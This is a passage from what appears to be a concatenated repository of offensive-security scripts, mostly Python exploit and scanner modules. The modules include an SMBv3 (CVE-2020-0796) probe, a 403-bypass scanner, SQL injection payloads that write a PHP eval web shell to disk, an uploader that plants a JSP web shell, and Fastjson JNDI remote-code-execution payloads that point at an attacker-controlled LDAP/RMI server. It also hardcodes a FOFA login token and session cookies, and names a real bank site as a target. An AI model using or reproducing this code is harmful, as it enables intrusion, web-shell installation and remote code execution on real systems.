b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' 27 | desc = 'Windows : CVE_2020_0796' 28 | info = 'WindowsSMBv3协议漏洞' 29 | #输出类 30 | output = Output(pocname) 31 | #请求类 32 | exprequest = ExpRequest(pocname, output) 33 | 34 | try: 35 | sock = socket.socket(socket.AF_INET) 36 | sock.settimeout(3) 37 | ip = socket.gethostbyname(self.url) 38 | sock.connect((ip, 445)) 39 | sock.send(payload) 40 | nb, = struct.unpack(">I", sock.recv(4)) 41 | res = sock.recv(nb) 42 | if (not res[68:70] == b"\x11\x03") or (not res[70:72] == b"\x02\x00"): 43 | output.fail() 44 | else: 45 | info = "{}存在WindowsSMBv3协议漏洞(CVE-2020-0796), IP值:{}".format(self.url,ip) 46 | output.echo_success(method, info) 47 | self.status = 'success' 48 | except Exception as error: 49 | output.error_output(str(error)) 50 | 51 | def check(**kwargs): 52 | result_list = [] 53 | result_list.append('----------------------------') 54 | ExpWindowsSMBv3 = WindowsSMBv3(**kwargs) 55 | if kwargs['pocname'] != 'ALL': 56 | func = getattr(ExpWindowsSMBv3, kwargs['pocname'])#返回对象函数属性值,可以直接调用 57 | func()#调用函数 58 | return ExpWindowsSMBv3.status 59 | else:#调用所有函数 60 | for func in dir(WindowsSMBv3): 61 | if not func.startswith("__"): 62 | methodcaller(func)(ExpWindowsSMBv3) 63 | result_list.append(func+' -> '+ExpWindowsSMBv3.status) 64 | ExpWindowsSMBv3.status = 'fail' 65 | result_list.append('----------------------------') 66 | return '\n'.join(result_list) 67 | 68 | -------------------------------------------------------------------------------- /EXP/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/EXP/__init__.py -------------------------------------------------------------------------------- /POC/ByPass403.py: -------------------------------------------------------------------------------- 1 | from ClassCongregation import color 2 | import requests 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | Trust_Domain = ['www.baidu.com','www.google.com','home.firefoxchina.cn','www.zhihu.com','www.csdn.net','www.weibo.com'] 7 | Trust_Original = ['/admin','/console'] 8 | Trust_Referer = ['http://www.baidu.com'] 9 | Trust_Proxy = ['127.0.0.1', '114.114.114.114'] 10 | Trust_Extend = ['/', '//', '/*', '/*/', '/.', '/./', '/./.', '?', '??', '???', '..;/', '/..;/', '%20/', '%09/'] 11 | 12 | org_headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)', 14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 15 | 'Accept-Language': 'en-US, en;q=0.5', 16 | 'Accept-Encoding': 'gzip, deflate', 17 | 'Connection': 'close', 18 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1', 19 | } 20 | 21 | proxies = { 22 | "http": "http://127.0.0.1:8080", 23 | "https": "http://127.0.0.1:8080", 24 | } 25 | TIMEOUT = 2 26 | def Change_Host(url, TIMEOUT=TIMEOUT): 27 | for i in Trust_Domain: 28 | headers = { 29 | 'Host': '%s'%i, 30 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)', 31 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 32 | 'Accept-Language': 'en-US, en;q=0.5', 33 | 'Accept-Encoding': 'gzip, deflate', 34 | 'Connection': 'close', 35 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1' 36 | } 37 | try: 38 | resp_code = requests.get(url=url, headers=headers, 39 | timeout=TIMEOUT, 40 | allow_redirects=False, 41 | verify = False).status_code 42 | if resp_code == 200: 43 | color('[+] Host: %s %s'%(i, resp_code), 'green') 44 | elif resp_code != 403: 45 | color('[?] Host: %s %s'%(i, resp_code), 'blue') 46 | else: 47 | color('[-] Host: %s %s'%(i, resp_code), 'red') 48 | except Exception as error: 49 | color('[-] Host: %s done!'%i, 'red') 50 | continue 51 | 52 | def Add_Original(url, TIMEOUT=TIMEOUT): 53 | for i in Trust_Original: 54 | Add_headers = { 55 | 'X-Original-URL': i, 56 | 'X-Rewrite-URL': i 57 | } 58 | headers = {**org_headers, **Add_headers} 59 | try: 60 | resp_code = requests.get(url=url, headers=headers, 61 | timeout=TIMEOUT, 62 | allow_redirects=False, 63 | #proxies=proxies, 64 | verify = False).status_code 65 | if resp_code == 200: 66 | color('[+] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'green') 67 | elif resp_code != 403: 68 | color('[?] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'blue') 69 | else: 70 | color('[-] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'red') 71 | except Exception as error: 72 | color('[-] X-Original-URL/X-Rewrite-URL: %s done!'%(i), 'red') 73 | continue 74 | 75 | def Add_Referer(url, TIMEOUT=TIMEOUT): 76 | for i in Trust_Referer: 77 | Add_headers = { 78 | 'Referer': i 79 | } 80 | headers = {**org_headers, **Add_headers} 81 | try: 82 | resp_code = requests.get(url=url, headers=headers, 83 | timeout=TIMEOUT, 84 | allow_redirects=False, 85 | verify = False).status_code 86 | if resp_code == 200: 87 | color('[+] Referer: %s %s'%(i, resp_code), 'green') 88 | elif resp_code != 403: 89 | color('[?] Referer: %s %s'%(i, resp_code), 'blue') 90 | else: 91 | color('[-] Referer: %s %s'%(i, resp_code), 'red') 92 | except Exception as error: 93 | color('[-] Referer: %s done!'%(i), 'red') 94 | continue 95 | 96 | def Add_Proxy(url, TIMEOUT=TIMEOUT): 97 | for Trust_IP in Trust_Proxy: 98 | Add_headers = { 99 | 'X-Originating-IP': Trust_IP, 100 | 'X-Remote-IP': Trust_IP, 101 | 'X-Client-IP': Trust_IP, 102 | 'X-Forwarded-For': Trust_IP, 103 | 'X-Forwared-Host': Trust_IP, 104 | 'X-Host': Trust_IP, 105 | 'X-Custom-IP-Authorization': Trust_IP 106 | } 107 | headers = {**org_headers, **Add_headers} 108 | try: 109 | resp_code = requests.get(url=url, headers=headers, 110 | timeout=TIMEOUT, 111 | allow_redirects=False, 112 | verify = False).status_code 113 | if resp_code == 200: 114 | color('[+] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'green') 115 | elif resp_code != 403: 116 | color('[?] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'blue') 117 | else: 118 | color('[-] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'red') 119 | except Exception as error: 120 | color('[-] X-Forwarded-For: %s done!'%(Trust_IP), 'red') 121 | continue 122 | 123 | def Add_Extend(url, TIMEOUT=TIMEOUT): 124 | for i in Trust_Extend: 125 | url_new = url + i 126 | try: 127 | resp_code = requests.get(url=url_new, headers=org_headers, 128 | timeout=TIMEOUT, 129 | allow_redirects=False, 130 | verify = False).status_code 131 | if resp_code == 200: 132 | color('[+] url: %s %s'%(url_new, resp_code), 'green') 133 | elif resp_code != 403: 134 | color('[?] url: %s %s'%(url_new, resp_code), 'blue') 135 | else: 136 | color('[-] url: %s %s'%(url_new, resp_code), 'red') 137 | except Exception as error: 138 | color('[-] url: %s done!'%(url_new), 'red') 139 | continue 140 | finally: 141 | url_new = None 142 | 143 | def check(**kwargs): 144 | url = kwargs['url'] 145 | #url = 'https://moa.cmbc.com.cn/moastatic' 146 | try: 147 | resp_code = requests.get(url=url, headers=org_headers, 148 | timeout=TIMEOUT, 149 | #allow_redirects=False, 150 | verify = False).status_code 151 | if resp_code != 403: 152 | color('[-] Page has not return 403!', 'red') 153 | return 154 | except Exception as error: 155 | color('[-] An error occurred %s'%type(error), 'red') 156 | return 157 | #url = url.strip('/') 158 | color('[*] Scanning target domain %s'%url, 'green') 159 | Change_Host(url) 160 | Add_Original(url) 161 | Add_Referer(url) 162 | Add_Proxy(url) 163 | Add_Extend(url) 164 | 165 | if __name__ == "__main__": 166 | check(**{'url':'https://moa.cmbc.com.cn/moastatic/'}) 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | -------------------------------------------------------------------------------- /POC/ByWAF_Mysql.py: -------------------------------------------------------------------------------- 1 | def tamper1(payload): 2 | if payload: 3 | payload=payload.replace(" ","/*!90000aaa*/") 4 | payload=payload.replace("+","/*!90000aaa*/") 5 | payload=payload.replace("and","%26%26") 6 | payload=payload.replace("=","/*!90000aaa*/=/*!90000aaa*/") 7 | payload=payload.replace("union","union/*!90000aaa*/") 8 | payload=payload.replace("#","/*!90000aaa*/%23") 9 | payload=payload.replace("user()","user/*!()*/") 10 | payload=payload.replace("database()","database/*!()*/") 11 | payload=payload.replace("--","/*!90000aaa*/--") 12 | payload=payload.replace("select","/*!90000aaa*/select") 13 | payload=payload.replace("from","/*!90000aaa*//*!90000aaa*/from") 14 | return payload 15 | 16 | def tamper2(payload): 17 | if payload: 18 | payload=payload.replace(" ","%23a%0a") 19 | payload=payload.replace("+","%23a%0a") 20 | payload=payload.replace("order","order%23a%0a") 21 | payload=payload.replace("--","/*!90000aaa*/--") 22 | payload=payload.replace("#","/*!90000aaa*/%23") 23 | payload=payload.replace("and","%26%26") 24 | payload=payload.replace("union","union%23a%0a") 25 | payload=payload.replace("user()","user/*!()*/") 26 | payload=payload.replace("version()","version/*!()*/") 27 | payload=payload.replace("database()","database/*!()*/") 28 | payload=payload.replace("group","group%23a%0a") 29 | payload=payload.replace("select","select%23a%0a") 30 | payload=payload.replace("from","from%23a%0a") 31 | return payload 32 | 33 | print('Mysql混淆,目标处输入语句!') 34 | print('''常用语句: 35 | '+like+substr(1/(case+when+substr(database(),6,1)='N'+then+1+else+0+end),1,1)='a 36 | 1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) 37 | 1'and substr((select database()),1,1)='a 38 | 1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+ 39 | 1'union select null,null,0x3c3f70687020406576616c28245f504f53545b76616c75655d293b3f3e into outfile '/var/www/html/1.php'--+ 40 | 1' union select 1,2,'<%3fphp+%40eval(%24_POST[shell])%3b%3f>' into outfile '路径'--+ 41 | 1' into outfile '路径' fields terminated by '<%3fphp+%40eval(%24_POST[shell])%3b%3f>'--+''') 42 | def check(**kwargs): 43 | payload = kwargs['url'] 44 | payload1 = tamper1(payload) 45 | payload2 = tamper2(payload) 46 | 47 | print('语句一: %s'%payload1) 48 | print('语句二: %s'%payload2) 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /POC/Editor_vul.py: -------------------------------------------------------------------------------- 1 | from ClassCongregation import color 2 | import requests 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | ueditor_path = ['/ueditor.config.js','/net/controller.ashx?action=catchimage','/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:80/0f3927bc-5f26-11e8-9c2d-fa7ae01bbebc.png'] 7 | kindeditor_path = ['/kindeditor-all.min.js','/asp/upload_json.asp?dir=file','/asp.net/upload_json.ashx?dir=file','/jsp/upload_json.jsp?dir=file','/php/upload_json.php?dir=file'] 8 | ckfinder_path = ['ckfinder.html','/core/connector/java/connector.java?command=FileUpload&type=files¤tFolder=/&langCode=zh-cn&hash=&response_type=txt'] 9 | fckeditor_path = ['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/php/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/'] 10 | 11 | org_headers = { 12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 14 | 'Accept-Language': 'en-US, en;q=0.5', 15 | 'Accept-Encoding': 'gzip, deflate', 16 | 'Connection': 'close', 17 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1', 18 | } 19 | 20 | proxies = { 21 | "http": "http://127.0.0.1:8080", 22 | "https": "http://127.0.0.1:8080", 23 | } 24 | TIMEOUT = 2 25 | def Editor_check(url, editor_path, TIMEOUT=TIMEOUT): 26 | for i in editor_path: 27 | try: 28 | resp = requests.get(url=url + i, headers=org_headers, 29 | timeout=TIMEOUT, 30 | allow_redirects=False, 31 | verify = False) 32 | if resp.status_code == 200 and 'DOCTYPE' not in resp.text: 33 | color('[+] Host: %s %s'%(url + i, resp.status_code), 'green') 34 | print(resp.text[:50]) 35 | else: 36 | color('[-] Host: %s %s'%(url + i, resp.status_code), 'red') 37 | except Exception as error: 38 | color('[-] Host: %s done!'%(url + i), 'red') 39 | continue 40 | 41 | def check(**kwargs): 42 | url = kwargs['url'].strip('/') 43 | #url = 'https://moa.cmbc.com.cn/moastatic' 44 | #url = url.strip('/') 45 | color('[*] Scanning target domain %s'%url, 'green') 46 | Editor_check(url,ueditor_path) 47 | Editor_check(url,kindeditor_path) 48 | Editor_check(url,ckfinder_path) 49 | Editor_check(url,fckeditor_path) 50 | 51 | if __name__ == "__main__": 52 | check(**{'url':'***'}) 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /POC/FHAdmin.py: -------------------------------------------------------------------------------- 1 | from urllib3 import encode_multipart_formdata 2 | import requests,os,random 3 | 4 | shell_name = 'Caidao_cmd.jsp' 5 | 6 | def post_files(url,header,filename): 7 | data = {} 8 | data['imgFile']= (random_name(6,'.jsp'),open(scriptPath+'\\execScripts\\'+filename,'rb').read()) 9 | encode_data = encode_multipart_formdata(data) 10 | data = encode_data[0] 11 | header['Content-Type'] = encode_data[1] 12 | r = requests.post(url, headers=header, data=data, verify=False) 13 | return r.text 14 | 15 | def random_name(index,suffix=''): 16 | h = "abcdefghijklmnopqrstuvwxyz0123456789_" 17 | salt_cookie = "" 18 | for i in range(index): 19 | salt_cookie += random.choice(h) 20 | return salt_cookie+suffix 21 | 22 | scriptPath = os.getcwd() 23 | def check(**kwargs): 24 | shell_path = post_files(kwargs['url']+"/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/",{"cookie":"test"},shell_name) 25 | if requests.get(url=kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip(),verify=False,timeout=5).status_code !=404: 26 | print('[*]上传的shell路径: '+kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip()) 27 | else: 28 | print('[-]上传失败: '+shell_path) 29 | if __name__=="__main__": 30 | pass -------------------------------------------------------------------------------- /POC/FOFA.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from requests.packages import urllib3 3 | urllib3.disable_warnings() 4 | import base64 5 | from lxml import etree 6 | 7 | token = 'eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MzU5NjYsIm1pZCI6MTAwMDI2MDc2LCJ1c2VybmFtZSI6InhreDUxOCIsImV4cCI6MTY0NjMzODk5NywiaXNzIjoicmVmcmVzaCJ9.Aqfrl1A0C-WE_T5ZER2eaylK0SdJfWULS8bbnvqWSjlyFzNubPJjbPCqU9nJdKZwTPPUUXp6WBVw33R_tCVAbg' 8 | 9 | fofa_token = token 10 | refresh_token = token 11 | 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280', 14 | } 15 | print('''[*]请登录后使用, fofa查询语法: 16 | +--------------------------+---------------------------------------------+ 17 | | 例句 | 用途说明 | 18 | +--------------------------+---------------------------------------------+ 19 | | title="beijing" | 从标题中搜索“北京” 20 | | header="elastic" | 从http头中搜索“elastic” 21 | | body="phpcms" | 从html正文中搜索“网络空间测绘” 22 | | domain="qq.com" | 搜索根域名带有qq.com的网站 23 | | icp="ICP-030173号" | 查找备案号为“京ICP证030173号”的网站 24 | | host=".gov.cn" | 从url中搜索”.gov.cn” 25 | | port="6379" | 查找对应“6379”端口的资产 26 | | ip="1.1.1.1" | 从ip中搜索包含“1.1.1.1”的网站 27 | | ip="220.181.111.1/24" | 查询IP为“220.181.111.1”的C网段资产 28 | | protocol="quic" | 查询quic协议资产 29 | | country="CN" | 搜索指定国家(编码)的资产 30 | | app="Microsoft-Exchange" | 搜索Microsoft-Exchange设备 31 | | cert="baidu" | 搜索证书(https或者imaps等)中带有baidu的资产 32 | | status_code="402" | 查询服务器状态为“402”的资产 33 | +--------------------------+---------------------------------------------+ 34 | ''') 35 | #获取爬取的页面数量 36 | def pag_num_fun(word): 37 | print("[*]开始获取查询的页面数量...") 38 | #查询词进行baase64编码 39 | s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8') 40 | #查询的url 41 | url = f"https://fofa.info/result?qbase64={s}&page=1&page_size=10" 42 | print("[*]查询地址为:",url) 43 | #获取页面源码 44 | text = requests.get(url=url,headers=headers,verify=False,timeout=20,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text 45 | #获取爬取目标的页面数量 46 | tree = etree.HTML(text) 47 | try: 48 | #pag_num:获取到的页面总数量 49 | pag_num = tree.xpath('//div[@id="__layout"]//div[@class="pagFooter"]/div[@class="el-pagination"]/ul[@class="el-pager"]/li/text()')[-1] 50 | except Exception as error: 51 | print('[-]查询目标无结果,请确认查询语法.详细错误为:%s'%type(error)) 52 | #return 53 | #raise Exception("") 54 | print('[*]FOFA爬取页面数量为: '+ pag_num) 55 | return pag_num 56 | 57 | #定义爬取页面ip的函数 58 | def fofa(word, pag_num, num = 5): 59 | index = 0#实际页数 60 | s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8') 61 | ip_list = [] #定义存放所有ip的列表 62 | for i in range(1,num+1): 63 | #获取页面源码 64 | url = f"https://fofa.info/result?page={i}&qbase64={s}" 65 | try: 66 | text = requests.get(url=url,headers=headers,verify=False,timeout=10,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text 67 | except Exception as error: 68 | print("fofa函数中,获取页面源码时发生错误,错误所在地为text变量。详细错误为:%s"%type(error)) 69 | continue 70 | tree = etree.HTML(text) 71 | #提取一个页面所有ip地址 72 | try: 73 | r = tree.xpath('//div[@id="__layout"]//div[@class="showListsContainer"]/div[@class="rightListsMain"]//a[@target="_blank"]/@href') 74 | #title = tree.xpath('//div[@class="contentLeft"]/p[1]/text()') 75 | #country = tree.xpath('//div[@class="contentLeft"]/p[3]/a[@class="jumpA"]/text()') 76 | except Exception as error: 77 | print('fofa函数中,提取页面ip地址时发生错误,错误所在地为r变量。详细错误为:%s'%error) 78 | return 79 | if len(r) == 0: 80 | break 81 | for m in range(len(r)): 82 | if "//" in r[m]: 83 | #将ip地址保存到列表中 84 | ip_list.append(r[m]) 85 | #ip_list.append(r[m]+' '+ country[m]) 86 | #ip_list.append(r[m] +' '+ title[m] +' '+ country[m]) 87 | else: 88 | pass 89 | index = index + 1 90 | print(f'[*]第{i}页爬取完毕!') 91 | ip_list_new = list(set(ip_list)) #将ip地址去重,然后进行保存 92 | if int(pag_num) > index: 93 | print('[*]提示: 输入登录后的cookie即可获取更多数据哦!') 94 | print('[+]FOFA收集 %s 页结果如下, 总计 [%s]'%(str(index),len(ip_list_new))) 95 | for url in ip_list_new: 96 | print(url) 97 | 98 | print("用法: 在目标处输入查询语法,需要编辑源码修改refresh_token (普通用户默认查询5页)") 99 | def check(**kwargs): 100 | try: 101 | pag_num = pag_num_fun(kwargs['url']) 102 | fofa(kwargs['url'], pag_num) 103 | except Exception as e: 104 | print(type(e)) 105 | 106 | if __name__ == '__main__': 107 | pag_num = pag_num_fun('app=\"Shiro权限管理系统\"') 108 | fofa('app=\"Shiro权限管理系统\"', pag_num) 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /POC/Fastjson_RCE.py: -------------------------------------------------------------------------------- 1 | import requests,time,re,sys 2 | ###测试 3 | sys.path.append('../') 4 | from ClassCongregation import Dnslog 5 | #import ClassCongregation 6 | def check(**kwargs): 7 | url = kwargs['url'] 8 | #VPSip 9 | Vurl = kwargs['ip'] 10 | #VPSport 11 | port = kwargs['port'] 12 | 13 | dns_cookie = kwargs['cookie'] 14 | head = { 15 | "Content-Type":"application/json", 16 | "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 17 | } 18 | 19 | header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'} 20 | payload_ldap = { 21 | "1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}", 22 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}", 23 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}", 24 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}" 25 | } 26 | 27 | payload_rmi = { 28 | "1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}", 29 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}", 30 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}", 31 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}" 32 | } 33 | 34 | payload_other = { 35 | "1":"{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"nnivq5.dnslog.cn\"}}" 36 | } 37 | try: 38 | print('[*]正在利用LDAP测试...') 39 | for poc in payload_ldap: 40 | requests.post(url, headers=head, data=payload_ldap[poc], timeout=15, verify=False) 41 | time.sleep(0.5) 42 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15) 43 | 44 | if 'dnslog' in rep1.text: 45 | print('[+]target is vulnerable') 46 | print('[+]fastjson version:{}'.format(poc)) 47 | print('[+]poc:{}'.format(payload_ldap[poc])) 48 | return 49 | time.sleep(0.5) 50 | print('[*]正在利用RMI测试...') 51 | for poc in payload_rmi: 52 | requests.post(url, headers=head, data=payload_rmi[poc], timeout=15, verify=False) 53 | time.sleep(0.5) 54 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15) 55 | if 'dnslog' in rep1.text: 56 | print('[+]target is vulnerable') 57 | print('[+]fastjson version:{}'.format(poc)) 58 | print('[+]poc:{}'.format(payload_rmi[poc])) 59 | return 60 | print('[-]target is not vulnerable, or openjdk > 8u102') 61 | except Exception as e: 62 | print("异常对象的内容是%s"%e) 63 | 64 | print("[*]用法:java -cp fastjson_tool.jar fastjson.HLDAPServer 106.12.132.186 10086 \"curl xxx.dnslog.cn\"") 65 | print("[*]用法:cookie中要输入dnslog网站的PHPSESSID") 66 | 67 | 68 | if __name__ == "__main__": 69 | DL=Dnslog() 70 | a = DL.dns_host() 71 | print(a) 72 | if DL.dnslog_cn_dns(): 73 | print('good') 74 | -------------------------------------------------------------------------------- /POC/Fckeditor.py: -------------------------------------------------------------------------------- 1 | import requests,time 2 | from requests.packages import urllib3 3 | from CodeTest import color 4 | urllib3.disable_warnings() 5 | 6 | #敏感信息路径查找 7 | Fck_path_list = ['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Imag